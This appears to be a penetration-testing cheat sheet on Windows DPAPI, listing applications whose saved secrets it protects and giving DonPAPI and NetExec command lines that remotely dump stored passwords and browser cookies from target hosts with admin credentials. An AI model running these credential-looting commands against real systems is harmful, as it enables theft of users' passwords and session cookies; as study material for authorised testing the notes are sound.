DPAPI

Require Local admin privileges or DA privs

The Data Protection Application Programming Interface or DPAPI is a set of APIs in Windows operating systems used to encrypt and decrypt DPAPI data blobs on a per-user basis for Windows OS features and various third-party applications. Here are just a few examples of applications that use DPAPI and what they use it for:

Applications	Use of DPAPI
Internet Explorer	Password form auto-completion data (username and password for saved sites).
Google Chrome	Password form auto-completion data (username and password for saved sites).
Outlook	Passwords for email accounts.
Remote Desktop Connection	Saved credentials for connections to remote machines.
Credential Manager	Saved credentials for accessing shared resources, joining Wireless networks, VPNs and more.

Tools

dploot

GitHub - zblurx/dploot: DPAPI looting remotely in PythonGitHub

dploot

Donpapi

exegol-CPTS /workspace # DonPAPI "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"

Netexec - CME

NetExec - CME

nxc smb <ip> -u user -p password --dpapi

nxc smb <ip> -u user -p password --dpapi cookies

nxc smb <ip> -u user -p password --dpapi nosystem

Dump DPAPI | NetExec